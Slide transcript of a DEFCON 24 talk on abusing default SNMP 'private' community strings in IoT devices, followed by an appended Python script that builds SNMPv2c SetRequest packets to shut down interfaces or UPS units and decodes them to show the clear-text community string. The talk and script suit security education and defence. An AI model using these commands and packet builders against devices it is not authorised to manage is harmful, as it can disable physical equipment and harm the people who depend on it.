
DEFCON 24 IoT village - snmp remote attacks bertin bervis

Bertin
August 11, 2016


In this talk I covered the scenarios in which SNMP, with the default private community string with write properties, can be abused in IoT devices in order to modify behaviors or conditions that affect real-world environments.



Transcript

  1. SNMP AND IOT DEVICES: LET ME MANAGE THAT FOR YOU BRO! Bertin Bervis Bonilla, NetDB Project Co-Founder
  2. Important Disclaimer: You don't need to do something illegal or stupid, you could be caught. This research is for educational purposes. My experience in a real scenario.
  3. Agenda: whoami; SNMP in 5 minutes … or more; OSINT / IoT search engine NetDB; SNMP remote attacks; DEMOS; Conclusions/recommendations
  4. In a nutshell: SNMP versions v1 and v2c (community-based) have NO ENCRYPTION; community strings travel in PLAIN TEXT. Many vendors ship the default community strings PUBLIC (read-only) and PRIVATE (read-write).
  5. The OID interface index (ifIndex) 1.3.6.1.2.1.2.2.1.1: "A unique value, greater than zero, for each interface. It is recommended that values are assigned contiguously starting from 1. The value for each interface sub-layer must remain constant at least from one re-initialization of the entity's network management system to the next re-initialization."
  6. • The snmpset command is used to actually modify information on the remote host. For each variable you want to set, you need to specify the OID to update, the data type and the value you want to set it to.
     • The valid data types can be found at the end of the snmpset help output:
       % snmpset -h |& tail -4
       type - one of i, u, t, a, o, s, x, d, n
       i: INTEGER, u: unsigned INTEGER, t: TIMETICKS, a: IPADDRESS
       o: OBJID, s: STRING, x: HEX STRING, d: DECIMAL STRING
       U: unsigned int64, I: signed int64, F: float, D: double
  7. The OID ifAdminStatus with snmpset: 1.3.6.1.2.1.2.2.1.7.4 i 2, where the trailing 4 is the interface index (ifIndex) and the integer is the new administrative status. ifAdminStatus takes 1 = up (ON) or 2 = down (OFF), so setting 2 turns interface 4 off and setting 1 brings it back up.
  8. So… let's abuse the READ/WRITE access that the default PRIVATE community grants on so many devices. POLL everything on the public Internet!!!!!!!!!!!
  9. NetDB – The Network Database Project • Scans the IPv4/IPv6 public address space • 24 hours • 70+ protocols • TCP/UDP • API • Probes for SNMP PRIVATE community strings • sysName OID 1.3.6.1.2.1.1.5
  10. SNMP is everywhere in IoT. After months of research we found: ATMs, cars, traffic light systems, heavy networking equipment, industrial equipment, medical devices, SOHO modems/routers.
  11. But… in this scenario you can turn off the whole device (UPS-MIB):
     • upsShutdownType 1.3.6.1.2.1.33.1.8.1
     • upsShutdownAfterDelay 1.3.6.1.2.1.33.1.8.2
     • upsStartupAfterDelay 1.3.6.1.2.1.33.1.8.3
     • upsRebootWithDuration 1.3.6.1.2.1.33.1.8.4
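What the snmpset of slides 6 and 7 (ifAdminStatus) and the UPS-MIB set of slide 11 actually put on the wire, and why slide 4 matters, as an added example that is not code from the talk or from the NetDB project: the script below hand-encodes an SNMPv2c SetRequest with BER using only the Python standard library, then decodes the raw datagram again. The helpers `shutdown_interface` and `ups_shutdown`, the request-id and the community string "private" are assumptions chosen for illustration; the tags, OIDs and ifAdminStatus values are the standard ones (RFC 1157/3416, IF-MIB, UPS-MIB).

```python
# Added example (not the talk's or NetDB's code): an SNMPv2c SetRequest built
# and decoded by hand with BER, standard library only. It yields the same
# datagram as `snmpset -v2c -c private HOST OID i VALUE` and then decodes it
# to show that the community string rides in clear text.

# ASN.1/BER tags used by SNMPv1/v2c (RFC 1157, RFC 3416)
INTEGER, OCTET_STRING, OID, SEQUENCE, SET_REQUEST = 0x02, 0x04, 0x06, 0x30, 0xA3
SNMP_V2C = 1                                        # version: 0 = v1, 1 = v2c
IF_ADMIN_STATUS = "1.3.6.1.2.1.2.2.1.7"             # IF-MIB ifAdminStatus (slide 7)
UPS_SHUTDOWN_AFTER_DELAY = "1.3.6.1.2.1.33.1.8.2"   # UPS-MIB (slide 11)
IF_UP, IF_DOWN = 1, 2                               # ifAdminStatus: up(1), down(2)

def _length(n):
    """BER length: short form below 128, long form (0x80|N, then N bytes) above."""
    if n < 0x80:
        return bytes([n])
    b = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(b)]) + b

def tlv(tag, body):
    return bytes([tag]) + _length(len(body)) + body

def enc_int(v):
    """Minimal-length two's-complement INTEGER."""
    n = 1
    while not -(1 << (8 * n - 1)) <= v < (1 << (8 * n - 1)):
        n += 1
    return tlv(INTEGER, v.to_bytes(n, "big", signed=True))

def enc_oid(dotted):
    """OBJECT IDENTIFIER: first two arcs packed as 40*a+b, the rest base-128."""
    arcs = [int(a) for a in dotted.strip(".").split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for a in arcs[2:]:
        chunk = [a & 0x7F]
        a >>= 7
        while a:
            chunk.append(0x80 | (a & 0x7F))
            a >>= 7
        out += bytes(reversed(chunk))       # continuation bit on all but the last
    return tlv(OID, bytes(out))

def set_request(community, bindings, request_id=1):
    """SNMPv2c SetRequest: Message{version, community, PDU{id, 0, 0, varbinds}}."""
    vbl = b"".join(
        tlv(SEQUENCE, enc_oid(o) + (enc_int(v) if isinstance(v, int) else tlv(OCTET_STRING, v)))
        for o, v in bindings)
    pdu = tlv(SET_REQUEST, enc_int(request_id) + enc_int(0) + enc_int(0) + tlv(SEQUENCE, vbl))
    return tlv(SEQUENCE, enc_int(SNMP_V2C) + tlv(OCTET_STRING, community.encode()) + pdu)

def shutdown_interface(community, ifindex):
    """Hypothetical helper: ifAdminStatus.<ifindex> = down(2), i.e. slide 7 with `i 2`."""
    return set_request(community, [(f"{IF_ADMIN_STATUS}.{ifindex}", IF_DOWN)])

def ups_shutdown(community, seconds):
    """Hypothetical helper: upsShutdownAfterDelay.0 = <seconds>, the slide 11 case."""
    return set_request(community, [(UPS_SHUTDOWN_AFTER_DELAY + ".0", seconds)])

def _read(buf, pos):
    """Decode one TLV at pos; return (tag, body, position after it)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def dec_oid(body):
    arcs, v = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        v = (v << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(v)
            v = 0
    return ".".join(map(str, arcs))

def parse(datagram):
    """(version, community, pdu_tag, [(oid, value)]) from raw bytes: no key needed."""
    _, msg, _ = _read(datagram, 0)
    _, ver, p = _read(msg, 0)
    _, community, p = _read(msg, p)
    pdu_tag, pdu, _ = _read(msg, p)
    p = 0
    for _ in range(3):                      # skip request-id, error-status, error-index
        _, _, p = _read(pdu, p)
    _, vbl, _ = _read(pdu, p)
    bindings, p = [], 0
    while p < len(vbl):
        _, vb, p = _read(vbl, p)
        _, oid, q = _read(vb, 0)
        vt, val, _ = _read(vb, q)
        bindings.append((dec_oid(oid),
                         int.from_bytes(val, "big", signed=True) if vt == INTEGER else val))
    return int.from_bytes(ver, "big"), community.decode(), pdu_tag, bindings

if __name__ == "__main__":
    pkt = shutdown_interface("private", 4)  # == `snmpset -v2c -c private HOST 1.3.6.1.2.1.2.2.1.7.4 i 2`
    print(pkt.hex())
    print(parse(pkt))                        # the "private" community is right there in the datagram
    print(parse(ups_shutdown("private", 300)))
```

Two things are worth noticing when you run it. First, the only "authentication" in the whole datagram is the OCTET STRING right after the version field, so anyone who can sniff one management packet, or who simply guesses "private", can issue the same SET; `parse` recovers it without any key. Second, the datagram for the interface and for the UPS differ only in the OID and the value, which is exactly why a single scanner that finds a writable community (slide 9) turns into a generic off-switch for whatever MIB the device happens to implement (slides 10 and 11). Sending the bytes is left to the reader (`socket.sendto` to UDP/161) and should only ever be done against equipment you are authorised to manage.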